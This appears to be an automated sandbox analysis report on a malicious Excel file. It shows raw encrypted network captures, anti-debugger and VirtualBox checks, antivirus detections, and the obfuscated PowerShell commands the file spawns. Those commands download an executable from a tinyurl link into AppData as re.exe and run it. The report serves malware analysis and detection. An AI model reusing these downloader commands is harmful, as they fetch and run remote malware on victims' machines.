Data received	÷ ôR0N06 @IU2Òñÿ¶ÒÉ8Bª0 H÷ 0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20 200803000000Z 210803120000Z0m10 UUS10 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0"0 H÷ 0 ô"6¢\¼üBdYûQÞ`ÃxWf]_Âäá¼ÇYQìV0jG^AåùÂÈ±ºÞÈx^(ôÜPÏ\|ó¿´wö âBiûbUÅbBY(ë%k¡û ÕO_¬iú³ÛN4Ý)Ý÷á¥¢©úoÏ)](KÕ`QÀTñÑg}WL)m.»ÜÁÊt¼T[u®ÔcÝô)&ÅTj²®4²èä¥+áP«ÏÆ½ûÃx«2Líó}ÅpXðVdØeQ8#Óä%[jåûï$AhY1ÿ_¼e?Xí£00U#0©ü²EIÁo04+Ù°%Wz0Ucó{F¥KvÔØäCZ·0<U503sni.cloudflaressl.com .tinyurl.comtinyurl.com0Uÿ 0U%0++0{Ut0r07 5 31http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 5 31http://crl4.digicert.com/CloudflareIncRSACA-2.crl0LU E0C07 `Hýl00(+https://www.digicert.com/CPS0g0v+j0h0$+0http://ocsp.digicert.com0@+04http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0Uÿ00 +Öyöóñwö\/Ñw0"T0VãM3¿ß/ ÌNñdãs±·5H0F!²Sç'À©ßÕ~KÊWc¡¸ÉhZðÁ !tIn!ÀfB ¢úý X\|@ÍÛn_ÉÖ÷bN-}ÓH5v\ÜCþæ«ED±^ÔVæ7ûÕúGÜ¡s²^æöÇÊs±·eG0E ]{qGl4°mÍTíAü4Ìì30¬DZÉtO!Ìø¼?ÍÁAU<4Ê;#\|¡ë.ÿ5Öî0Ï 0 H÷ yî7Þ µßÏ`^4(!Ë_M÷.púXz ELLâ@I;¨ºYÀj RtëÄ(g&V¦Xb4çGUmÇåÙàaªÑèZ»ñs>)2\|vZ:Øð0ÙJ¢ÈoXórBZÕôâ³¨]§Õ>>fÿcÖ¯Þ Ã9`çÂ~y4üEÏ#û+á=¿\÷f¹é¿L8$¡$ß¹¹ã&¢Í$?ú¥m³¹ª¿SY>jÏ"¯N}~]lmÝ¯²`&V#ôt¡çZ+tÖ¡ ª(ø $A`ësÿ&!00 Øsó³¸Ú[X8)0 H÷ 0Z10 UIE10U Baltimore10U CyberTrust1"0 UBaltimore CyberTrust Root0 200127124639Z 241231235959Z0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20"0 H÷ 0 µ]&È «±3]²Â1N~_Æo$íÚ®¾ç÷ÅÏTf8(èæi»ø1jVõèÁ¥èYè³à:a(°~Í ýÎ7Ãé©ÉxÊ¦`F¯t-OÚè RÈZ2Ï!!G\ªÀp±ñÞß-©ì[W99¾Âï×¶,J?ÑÖ³!¢O%,B#}×³Öi¯ÕªØhdãR/Ååô¯å ÙFçÏ2"ð7ÄýæâÌ:H×a¿=rÙp^ì i$â<HãþÓåQÔ+À¡Op¿·Òni-ÈÍ¢bLC7_:vZúni]ÅÁ£h0d0U©ü²EIÁo04+Ù°%Wz0U#0åY0GXÌ¬úT6{:µMð0Uÿ0U%0++0Uÿ0ÿ04+(0&0$+0http://ocsp.digicert.com0:U3010/ - +)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `Hýl00(+https://www.digicert.com/CPS0 `Hýl0g0g0g0 H÷ \|°¦dráaÝót=P§çÂN&+Açð°óòÒçPÒÆ©ºë¾ÁÁøO¼\|ær/é¶ÆviÝòjGkT¤ 5'ÝÈÓ´àÚ¦ðçÏæÒËÚ"wØI¨UÔÒÎÐèÚàBýÎ~Ê§Ã')¼ÿí.4ýFïNV\|èÜ"íS [º{àòO¥YAÍ³r.\ozJC+"ËÔ? \|óú\|ÛJsqéÕÝF¶qßõP~3Ò5u$^Z¨Eô´Ø¦±déûùeHöÃF~Z0S]4âòñðøã
Data received	K
Data received	GA§D«®ÞÌ´$Ëf7;+Åý"¦ãõ¤yÜZà~¬ºýo}®}_VBOmè=Hyé±øc ìmJ%ÀX¿¤POSÅ dü=ñÑìôÌSUÿ!6QãýÆb¤î¾ò)ÝÛ. ÂÖ4gwÅ°û+¦ÒKVl¾ ¦qyfýÓ=F`_ÒE öBÉúÉÀ¿YÍÒg½î zóW 2ÄKeOüd@¬^kKJRæÕÇæ{§i¨¯îÏ®Ü^ì¦!Ôµ\|ßÉìÍha©Ê_ é©;Â·±<W9^Ì!ñ¾îª w(ñû×æYZhQ0mK7Îs#LQv&¼ótBÜ6Å½Ó+ïz»=<_å åÜ¬pw&
Data received
Data received
Data received
Data received
Data received	0
Data received	Pe©²?R©Ã5´=ËÜIÙB/<{ir*7÷6aÒÜÝ þÿ.ëwD
Data received	p
Data received	À;µ¤tî< =ÈwÕØlßå¦øÐqm¦EJù;Æèê^ìÖ¸®ÛnÝvýÂØ4¶ÐzC·ò!?Íq5´rD\|ÒZgÑÆo:Rý:0uER3Ç.Çê =M9òN[ê&Õ?t=>jbËZEV÷d¶ÎoÐ².N;zr©¿d6ø(®G¾©ñw¾Ñe6üûC,ºúiè¥Ã2lPÏ³'3k¦Ç4~#ÖÈç1ëÛ»`\|i¥¿ÎáÈá'_yV~tÌ"W.¸×\|ÏFAñq¯ÂM³²#2L÷»Û=Oü}!äpíuvÎð8âéï)tXZl´³Æ?ïÐ8Uç<â ¬µ+æNaÅúÔÊñ\|ÈT;5Ð§[kãDMÂB^\|rQCÈçË¢åÃø{±WÏÓÛÉÆ,B5 fÉ#Ö@¾!ãé\|ý;ýR_&W¶±=Q÷ziÒÁ¿9¹´Ú¯®ÓqËy#wÕ½"×Ôºï\§ìª%÷ùùèÂRÖåØ¼zÞºsç,TME´ì)óÛ<Ó]BH×Ê~ÊTL_ê¡N#þ½^ör»áRbd·ñ³U¡)zÄ2'ßW©²»~ø.aÓcò þ/É>³YP¸\|"{°íü4ÄCyÛ«E¿ðSn¡ c"W±²µËæ_hWF¾<JC }Íã~Q Úëáá4OÝÞ :u2¥5yÐQtqØé}ór@¿ïsö&¼4uì¡ê\|ÌYþqvynV°04 Q¬À¦+°áa4nÄÖEcjÅHð ¹ Â VÄçEúýR°Ì §jcÉ¹µ8H±¶[OóW³Vªñ³ÊØå«X_÷©7\³p5ðÁ_´±Å¯ê»p! ^·=%¿}5:÷P¸¡¥Ì77#È. )y%×Y¶v¦5Må7ëÉmË_Lï2'¼»ñMq¬oûÂhÉÕ²8qïÎIsáõÍÈak¾~"åwËï5ñGxo¦VÒóü0÷ü±ªÜ5XµõUC1À(fL)ß*Rm¶bj&Êbì_uüob%îi?I¡òx¹`.M²!Ð±ã)S>µ×¢å)F¯=KGþl)µ±RËÀ½ODx6Dån i)àÒÌ<ªÐéóDoÂ$/æ Î°@_7ao6Ã®Êdæ=ôFð¿¸EkH<7ª(Ú^G2ÎÄJdÙäê´½òýGá$öBiP+Ø=XxLGÒ?K}xµ^Z b,¶!°ãÙ^¿,ÊjEk8AÔ?Úýö%8«\|x{µìU·Q_®:Cý/ñìy÷²Ñ1º!©[9@üOTâE«u5,n Ðo$bqú³Xwº"ÄZ24ãÈúV¢Ë$a`É2¡%ßL+x¦¬KÎ¹®ýßñpÁ[¼rnBák0¬õ¾ÅtIÑw¤w ÙÈ.6~§Á´D{¬Otß÷ûã´ú+Ñüîñöñº÷T§ªÝÂÛ%sUÑÜ¿GAAO©-æ¼nÊyÃÕËÐÏúV Ö%ïÇ¡LaGpõ±jS P·Æ¤ ð@!çö.X¼HÇw¯PUÎòq©ñe=t«ê=é
Data received	`
Data received	ÐYÊ\|7XöLSþÈ:bá?¯ùc¥xBÿ)Öm³ËÜòud4ÿÈÓñ"!´àhË®?Å`ÞEöÕ,c½jÙ$Eô¶]¼oSNAlGZ\|
Data received
Data received	õ¥Ü@w2oÐRÛÍCkJdöA5L~$:ÓKµé
Data received	sE_~Ïî²97é¼»ôÂ¼ ñ?ïZ9ã1=Ý/æªo\¦üiH8ï¼ö@ø³òñásèë[X¤é0'è/v¨B4~#Äßk¼ó_ë³ÙÏÐJÅ.3®âbP®·â`jE$Û3 ¹àùìÈ®A Mañò§ý[Õõ©ÁrØ¹¥I&ÀíÒs~#"yP,ïîað«¤¾ÈY>ÎwÞýõÝûêÏèSrU~öf'EúhZu"}uo¤¹çäu\|®ºIvÓVãC7»²¤i~ÈéE@SLu-êÇrÐ¢ÓÖKÓÅ hàÄ/gwH¸m¶ë`<02+)mb®ìñþ[^E¿f½L¤ªÅp÷$®CÎ@³Ü_5¸¼ÀÉE^)Ç)ñ¤Ò½Òlg¿±6nA!No(²¤ö¦â_ÊõdHD còs\|Ìéu9,£U¦göa HÆ#:õèyÈÊ}¿½Iâ?2¦\| èp}Ê$LìY4<vSéwìáì!¬Ä~¼£µàø]0n¨¹xd,Ç&\|ãÒÝ»þÃ ÉIY®¥yr@¨¥q.ôµ°7OC²È=aûj3xcOÈý©~Ró Ú%/þù:RÁÚÔ6ÙÒrÔngäÆHGyJz/7ãv¨ÔdJ f½>·Mä²xÙ §vz»?3ZÏhÌwJß TÝDbn4Ñêã4ßX¤>NKDp62¥^Çe4ñYXhìªåº´êøuçq· &@ë)¥¾!aïi@ëháÞÝÀ8£§q)4Hø Å(À¾G~UñCQs¹Í26ø ¡usF þPÄ©°ÃÛÑnw{Bû6Z®[ÞãY¶¨®öî;ºõkW!îdÃnó¬@W«±Í¹ÇIMr¸Î#n¶Ó ´£ Öêl@oÝ¦Ë.r/ºÈúQ¦ök>M°°u² ÁêOØà;X+=pw\W¡;!ïôJÎòXÆ!YIDrrLøQ¥ `÷ýÂ+%MN8×!aÐ®øAÝ3Kßãó\| ùq® .ù×p.B\|s ÊÄ'!1Ðkq,qËèHå&DÑÄª db2mÙ°çÇº/,>>ÊqÅ LªyVök-ú¢9þu#Õ«tÐÄU IêÁ'ùêa2gërù¡v£e¼ a³lÏc¬'>Ué¨¹¢ºí³&Fó¾on#0Cì\ÅGÆÀ©´ù6x'Ó0äÎDéÜÀÙÀÙ;Êç§¥ 3Åï3GÖóTÝÿGMØúìÊdC_º¥Áòæ>¨vúUÿ4®Ý´z´ýg5?ØqéA§"öXÕl$ëô¢C ¶N\ù5ÓÊDÀ Þ}¼¦¢ËM_L¨vÉ×o6NÍ>soyz¡ìGoåA/w;ç× ÀL5Cp µ<ôìòB¬¦y´nW×õãakºA Ù2Üóôù)ÆUeõiåTT8!Á4É¯ÅZý´ÇÙîÆ wÃ\(WÎSu8È¨>·\áK$Ðe¶ùN'cuV"zý:MV2:ðx¦! 3MòfáÛ êÂÄ&ÈØM!Ä+uô¼ûöàNr£þ¤O
Data received	à
Data received	iSÌÆ[!'ª·ò®EãLí¶¸¨ìÝ!¾N¨d·çxD÷Cwÿ<ª=êKÈÝXÕ ¾Å BO.II]× Q×Ûf¢"cÎZÈ Öºíf~û¾¤{ÚûÖtZî0#íh¨àØ5æðK'&[Èr©áÛ`XªQò,ÍSwVZ'¯AÙ(%°UnäHGöÄ+¥H2{T8<íp¶ Í¦¤XàSÔâB<ÐsVEoªðgüýöwKÙ¡¦ÿKûa2óåbúÈúå<Çààçæ½[dp] m±Á¬e¿ß!ºcÝÍ\|6")Ö$æÚBí\sÇA`¢fþàê]FïÝüA:L«·uyvôéáyg~K2Ô!ªúºNÙ)êÍßì¢T^·Qþúv_p@ÿïMHKº8çãEìîíK×YÔ$(Dt=¶LV[°TEÞ 4pñó¾7 Ç¾h5Ëçä]Æ"ëÄv6ëýÿÞ,ýãMçÕó?;.XhHePVåÍÝÆIE\B_vÆ)gbðVìA+y=.¦]ZKB{FÝ_ºº6àkÁ"îø³Gé´B-3·p"iiÓZR'£î-µëÇ6õÈui¯ §³¤Øâ¬KoÞ§ôÔÁßjº PWö0Ò6GHÖ#iÄL£Pª_'ÂÜFgK`~+¯Á®&Ø+¾´nÀx';Üà?ñ¯Cånðá¤ÅáÂËDÖ5ÝDÿT{vÀô[ Ú{ÔñJ;Êv=ùÉáY¬ABC¿äÆæó¸ F `¦¾õ<É Fæã;øÈØOÀ·µúIë¦+ãô§3$ËX±>WØdãw ÄõS½7§¸Ú=w
Data received	5Õþ}Õ®ËßP}MÝvbªÒ:.ç ¿cbSã)ðFoi/A HBy3zùWÏµ0Oç+DÈQDðµêÃòO°f@¥OT°¤P$ ý_cæªHàaÞDSà£'}º t^×íxu¨çPë!Ê;V¯ªñú^!ÕºüºuHao}??¬¹«ú»â×ÍöFvbê.èr »°þHQtÅJÐ.ô©#«dô>Ùä)å\|PyT¢@nÌdÔ´;vGçÒöfà±_üx«å0ÎbÊÒ;ªµº&¸7üÁ\¡:$gì¦GeqZ÷Xë@sÎj@r~2Àö¹øf i7?¨5"É1fº«øjÀçá#sky:¸·VéÔtÍx7§¡¼ËÓ¿¤s~Í[+?5 0}-Hò5_oªjEÑvbXÚY¢´y¶<r¢yAéZoÐEâÑ~BÏsáC§pÕår ï>ª1¼ï¼{¥ôß´tCf}XÓ¨uoñÿ í´õü}» þà¢1ýq±"ý¡ ÛF¤åö8Z\|ÿ¨¦võ>rÔ=ö°«Ã'í¾V¡6â ©ÑCfã¼ < =ªPJ¯ t½[ÍP¯aPù+¹Î¦uçÜTJËóíÃåNsYWêpò]<K0;dJ^f_Z¿Ûú³}+TðëÏ`ár§Tö"MB @Å<Àå%µù©X-Í ¬¾rWp* nøvL¾ðºÝnþsoîUPxc_ó£EHhLµÊ_Ã* 2sU³2UêÞ$§,³ I÷4±CéûP ÏóGwNêÞ}Ø:GëÄBLYp!°«ì§0_y1ïbOÕ6Y·2dØòJ`zJ>'"©3¶}øl.ãøßN°«k¦»òHv ¼Î±Ü0Vì±B)Ëq#9F¨eLÅZ¼[è¥ûjpjÆRßX(ý+ nbãüì:Åé`t OðG5 ñ½ÿªÃ¢X/4vÔòø¦/¡³þVÚ\|"ÝÉ.QyyÕªå5É1é`ýöf7rØVí[;0¦rbGÎb¢([U2>WUBý'w] µæ\)³·µÝ9ÞlüÔ &àü"ÃÞË'âéÆjoÖ2¯<÷Ûâ_¶(ÁÖbE¨juG{¼àÇYï$"îÑù,vÂ$+/÷ø9O]ÆCD(ãé°·#ê¬VäFl¯³-øQ=<ÕEÒå¸C=1^qwsÑ·N£ô#Õ`£.úä"p´ ]ùÏ>NOcà,A¹sÂéMÄÉ]N Ö÷)2³ú}Òûêeï\|§<~aotÈ-7=,¼Qµ,ïºp~u~90ï=ÿüUJ\|Q¿ûÚ¾æór> Ël¶èÃ°í¡·÷CXJÎ%-ÃüàCó@¢ ÀïiïF&.Üó%Â ÝËæY÷E"Äùñ¯¦¸âüàß#zq°.ô¬©Ù·Ä+õµ¼:Óµï<ÇÐ8#qê .hçåÔ©&§SÍÖÝ¼Uò9Lqû Ç<ç+,u tyªwôï´ÍæÅW¢ia%aáf²IfþÝ¦ÙÒ x
Data received	0§`î3f0û]ÆFïv®ZK £¸·ÑÉ£¼_DßC¶Lîj>ôô4MpCY=FyÜrèÔBUÜ»angHKbë»¼áPÊºØxzâÙczêÖvUs È©ûs4U3¥=ºÝTò#g ÂnC¤hN5Q°F®ßAoh¹O¿ÂR>Êëá0²YoÞ¸ÊDÓð¸ôèaåuµã ú¿î²êLºGÑ»¬¦þ~³¬ :mazdcj×dî3ËÝÄäCÛ¥:¬KÛOA_gP`ËM>lQÎBô\¢ËÒPÏª¤ÚsÑKHûÁ.dám_7àªÔ-åjëók°¨TqÙT²pÑIñäqo-ç~+ÓYÆµ;z"¸½úàÇ©LMnpõW-ä¤ÇÉÜ]Ôiâlâ£ùÅCÀu$Iÿ¹ýY[ÝÔ{m í¸~ÜÆ½5%[¨íÊ+\|þ<-ðzóÜøéúê-6a§;¨0À¶ØhÍ¯¬Ãå½-JÇåAy<¹éDÇKÕÚt¯øû3ºg½×©1CAùÝÎ. eÚÛ»¥#àLGh£o1þWTûqªKóô5ï(êÞe2ÂÅ+î(ó¼ÞTcî¤jôaà¨SR²pÌ=PåB[/Ï,ÂJÊ÷Ëõ¸¬·»¥<2$ÑÞææL¾ï57Ô+4Þ%[1'ÓðÇ}Gj.§ ¦äO÷§Ñ_9µâç» ì^IúàJözÑ&Uè´×ÅN´«ôVP¹Íæ"E-±&±]HimÚí4Lt§ìM2y[ÓóÂ7Â,54¾ÒRÞ=}HBÉ31ßÆù ÄY0±-)×L²&¡²æþÎ@ØÁùØ K¯/Ò,½ëðí¶Æ¥8!§¬FÁ0ðrHû¡Ð¨ö{"½gÓÄÌ]n¢=Ù¼t¬'ñP·ÙÉÂHZ)Ãþü 2©þÒ¨æÀìmîÙukïnb°R»7¨o»ÖÄ6ÚI§ÉíùÒ0{Ò°è¨$K¿Pa8¨â;VxfÔÊÿO4Diàp«â´î>!iÞSÀôy:mLÞ½(tDÓÂYÛÓábÌìê×XéÝ·÷L\ä QLsj¶?æ«øåä+gYèª~Uýyzþ9@3Ô³¦ Óòí!$ôF2r Ävë²]±øSãßQbm_¿pLÎùva^´³Ç_>{zjqlå;Ï©ü×à ÆÉ0"ëU,®þ\K§ôºT6ô®<ô³ÓLvêA}xRUáÉw$à´¯@°QÙµ§(ãlÓ¢?×ëQ<< ¼<Mz²³ZºHé×ZÐC1ªRÇ¹ýÊÝy^. Få>)nwóÌZ#áu,-·°¹7ï )±½¡ã_´Z)Ñ 6z Ôs_¦þ\Âµøì¯E¿5OfB]M=n~ÎßæÝcøÏ&ÙÆ°ÜdwËãë~ÍyÄ³µnÚ.e#[Xô©þ9<`zÕ~"!^·æÑp=?¹äóM9Î°´ª_O1®U5 1«Ëöê\ýÅQóKKvòéG4Éà§lÆè¦#É+'ë1é¨ÉÕÈ`wÌïÙ¤Ô
Data received	>%ªË·×[1¾¾j9üÐÒú®N§,)Zÿ±gÍ&Ô4fùèÙÀoY¨LS×å®¨a;l#2¢Ûòi¼Ä¸{à'[iò]>ò?l\|$h§´ÎpÐ& ×ø "ù ýdv'_ÒPìÏþ0Ò3oZ0©T¯´ÚItÒ®ú_êþ6ü2ÁîÓzeïÅÀß¨éÅå@Î×~kÆ EÉf8äúVùqD. ¹doîÝ²ÎÜ =?W¬fk`?_?«·)Ó§HW-bv£ vÜ§\|7»ðÎZ@[ïr¬³pGusaGR57Ùÿ×6n÷ôDÁOÃÈë×ÊôDTùZ<½x1K¤±¬}y2©ð¶ÉqFãÊ¬>0Yà²vFµkMèu¤Qtü Çl5Ô¹Ô;>Í æXnQ5³R/ú V!TÓÁStó=P¿r¤#Éß#Sa¥næ.mG+ZþlþfbìZ¾ìzK]¶8ÓF+é¹.>¡S`Z"³å¤ÂyÀ3¨/{wxJ°ÏtÇÉªéß¡ ä?Âoò$Jx¨ÙZ½OÉÊ¥âºë´¡¯SHð`æ~÷´5ÌuÃF^°ºî¥TS:Oç¸Â¨ræ¤WÜ,Ãýê²Õu®ÏÝïîXÄ,ùµî··rÌ®-Ü¯SXÍ ØG"e«½ç9ÌÇø¬,Ãk©í7¿V¢Åmª1üÆÞµ[,\MÉ¢pËý_õ¶ã/nÝy£<r\YyB,¨úkë,Ü \|Q¨Ûª¡ YPàJÛ§@hëÊ%Öo>¥ÝèO!áþÀ7c6ñÚEÁÅUî_Ïé<ÁI ¢a¨d^k°Y¯ÿ[ðRC¥¾}ìò<ð¢¾Ã"cv²Nþ«zìÄÂEüô@Õ°«$] ^ìs¬)ÎWÀwGÃÁð¸¯K»ÙA} è;»s¢Ï¿xëï"t~ þÖRè,+ê@MÖj%+øË<¯.à)ó%(zÇ ¯sè ìÔ¢2.,£ÔÏ§»§VñK90×ÒVÿäÿhP»Î¸CûÙD-gB¢úe²þÏG'Îãa³×6ar\|rÏçéá«."ÇÖú.ÿüm3äådKÍV)ôPû6¹PðSëÖî5pçæã¥J½«.£o!´Ëìuw4÷þ´Ü3ãªUf:ô}åêjýmTo ØïL ?<vª ¿9G²!^Äâ#à®Ó$ bR¥ä9AaÛD°7lK °ÑÍÍ51I×¬ÌBÈJMÃÈKX¯Z4lêÏYB?}>mºá»ªyk;7ý(³Å¨XOÿ[0îóÙËßK*Êl·MÀ±2¸óµÚÁÓÐ`3gortRÖLìüöïôæÉÐãûÌ±5xç¾xXKöBoãlê¢Ý±>=j@u¨?¿TúBsz¿JÏG&ñãàþ£ÓyBÎq8 `î«ïÀ~÷ n«uq ÙÈºÂãRK²üq3~rë¹Æ%ï«æÇ÷ýì5=Ü[¨IÓpÄ_À\|'IÎº}¬&µä ï¢ÃB\|sF"¼¬·IZ¨¸zàI5¾Ë/Uç
Data received	Ð
Data received	5.·Í»E9,}jôê>LGvCãTjL¥P+8jÆRüçF2s%!÷(íÒ¿2N0Ì gjäÍNê9m7¥þñ~ñÃÒ;ThsKîØÃÄÇ~ZÏÙoN4h¿%þsZs¥ºRè¦Ë9\óhû5ì/SÒibüõ;Ïµ;³»1"Ó§Ë©4ÉîÉpôª èþUåÖÒKn\ÝÐeC@Lí{Ø¯Îø&Bû ,ñ[íÞ4-¹t71Ó\|QQ÷µ_×fõ¸ÍHÿÚaXMDO^^ýÞ8j XD>ölÆx1°úË;A[7c~ÿÇy1ÂX¦ùBïXà4é$®¼â'"q¤íÛÈéjXÏTºl°>&Ú&N,¼# ù:¸l½nzªïZ#¿n,ü+¡N&ÂJLtzAtÒh+>Yeä¯[÷¾À}çvH¾G}B%~s¡§B¾ð¥àÖ&¤#Ç¡4óB¡ßUÛéÈ°1ü½õ¿««hnëûÜ¥0ã1'MîJ¬gÕ%ýÚs¾½â&câ16~që+nUê@éýVÚÁTÜÝc_O¼QýU!ÎR»Ñf'È°dVÒÒ+rb ìÆhÀÜí×Xì[$x2¾nß«ò,Ö%ßú d§ÁÎwLÆ½î}´pÓS7Z°3ßsy3 ¹Úï§®^'±¡¯W7P©VÌwâbw}k²ÔºÝXm³E _~,áæ±ô:Ïr"sJ{§«I`l¯81¤9},vÍ"û1!ýë5_¹Ò4D¦@) ÅºXö åTNrDcU_¼°ã[ÑsM¥ìÞ45wxl.ýháp±}G l©ZÍnÁ¯4¹ïv²r8 ÚÚRY°ÒÛjBeß^@å>°vâg<÷ ¥Â£AZ?/{(&?@BGê oqMµö±s@ØR{3êå¹½ê$9)Ó¥l3®Bc Úcéï2ó3º+YRÛTèD6 ¾ÆN#nìÃ¯¨l^Ún7&8¬ùËBÉKÒ;Çe²ª=a\Im5/e,â+cï÷¯AS¡¯#Þã°´ý1ÒåÝ.½×È¯éöæýí!.ô.*ß'¹=Û,kyÁ
Data received	Ûå0n\L¿\¶§é~&\|³ýÂ¼vüÀÐvÜ

Poweshell is sending data to a remote host (4 events)

Data sent	nj`lÚÈXDâï¢AUéK]Ãýê]b0þÕ$Ó}³/5 ÀÀÀ À 28)ÿtinyurl.com
Data sent	FBA$Moµ¾\ë2jë´½×òÞ»¬ná¢g8%<MËÊPëC¦ÈsPúHÂ2:K "nÐ<"Ò/À0jÈÙ'Áâ~¡.{0%F%/ö>©¿to=%r×àÒ p»ú]u
Data sent	`¢ÖÂÉ÷ Wác^Ð®bÛý¸ÿsRïèYwa'~¦)l;Eñª&Àùí<ÉÄO$m1ÜMÓ^(&`±\vã±8 w}6 MAöqðcl}ø0
Data sent	p;á¾QÔ;~âÛ60o÷IÞÚ_7p {ÍÈ&×>ûc´øMP%$ÎnrÁä_fádKK¶t`*tnlÝ]JËÁDÎ]ÅBàa¯~´ü#ð/;.Kæ°Ý6í¤þ ò@ÓÍ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 6, 2021, 4:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 6, 2021, 4:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Checks for the presence of known windows from debuggers and forensic tools (1 event)

Time & API	Arguments	Status	Return	Repeated
FindWindowA April 6, 2021, 4:08 p.m.	class_name: ConsoleWindowClass window_name: ntvdm-18d0.1964.16c4	1	2884430	0

Drops a binary and executes it (1 event)

file	C:\Users\Administrator\AppData\Roaming\re.exe

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	excel.exe				martian_process	cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process	excel.exe				martian_process	cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send April 6, 2021, 4:08 p.m.	buffer: nj`lÚÈXDâï¢AUéK]Ãýê]b0þÕ$Ó}³/5 ÀÀÀ À 28)ÿtinyurl.com socket: 1504 sent: 115	1	115
send April 6, 2021, 4:08 p.m.	buffer: FBA$Moµ¾\ë2jë´½×òÞ»¬ná¢g8%<MËÊPëC¦ÈsPúHÂ2:K "nÐ<"Ò/À0jÈÙ'Áâ~¡.{0%F%/ö>©¿to=%r×àÒ p»ú]u socket: 1504 sent: 134	1	134
send April 6, 2021, 4:08 p.m.	buffer: `¢ÖÂÉ÷ Wác^Ð®bÛý¸ÿsRïèYwa'~¦)l;Eñª&Àùí<ÉÄO$m1ÜMÓ^(&`±\vã±8 w}6 MAöqðcl}ø0 socket: 1504 sent: 101	1	101
send April 6, 2021, 4:08 p.m.	buffer: p;á¾QÔ;~âÛ60o÷IÞÚ_7p {ÍÈ&×>ûc´øMP%$ÎnrÁä_fádKK¶t`*tnlÝ]JËÁDÎ]ÅBàa¯~´ü#ð/;.Kæ°Ý6í¤þ ò@ÓÍ socket: 1504 sent: 117	1	117

One or more non-whitelisted processes were created (4 events)

parent_process	excel.exe	martian_process	cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process	excel.exe	martian_process	cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
parent_process	powershell.exe	martian_process	C:\Users\Administrator\AppData\Roaming\re.exe
parent_process	powershell.exe	martian_process	"C:\Users\Administrator\AppData\Roaming\re.exe"

Creates a suspicious Powershell process (1 event)

value

Uses powershell to execute a file download from the command line

Detects VirtualBox through the presence of a registry key (2 events)

registry	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers
registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\VirtualDeviceDrivers\VDD

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

CAT-QuickHeal	Ole.Trojan.A942401
McAfee	W97M/Downloader.czq
Cyren	Trojan.OLXK-6
Symantec	W97M.Downloader
TrendMicro-HouseCall	TROJ_FRS.VSNTIS20
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
ViRobot	XLS.Z.Agent.57856.BS
Tencent	Win32.Trojan-downloader.Agent.Auto
F-Secure	Malware.W2000M/Agent.AZ
DrWeb	Exploit.Siggen2.44999
TrendMicro	TROJ_FRS.VSNTIS20
McAfee-GW-Edition	W97M/Downloader.czq
Avira	W2000M/Agent.AZ
Microsoft	TrojanDownloader:O97M/Obfuse.JQ!MTB
AegisLab	Trojan.Script.Generic.4!c
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	Generic.Trojan.Agent.AEJUPV
Cynet	Malicious (score: 85)
Zoner	Probably Heur.W97ShellB
ESET-NOD32	a variant of Generik.KHBWLI
Ikarus	Trojan-Downloader.VBA.Agent
Fortinet	MSExcel/Agent.AXZBT!tr
AVG	Other:Malware-gen [Trj]
Qihoo-360	Generic/Trojan.Script.ed4

The process powershell.exe wrote an executable file to disk which it then attempted to execute (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Program Files\DVD Maker\DVDMaker.exe
file	C:\Windows\System32\unregmp2.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\Administrator\AppData\Roaming\re.exe

9e227b07643afd3444c4d30f0c47c3cf.xls

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All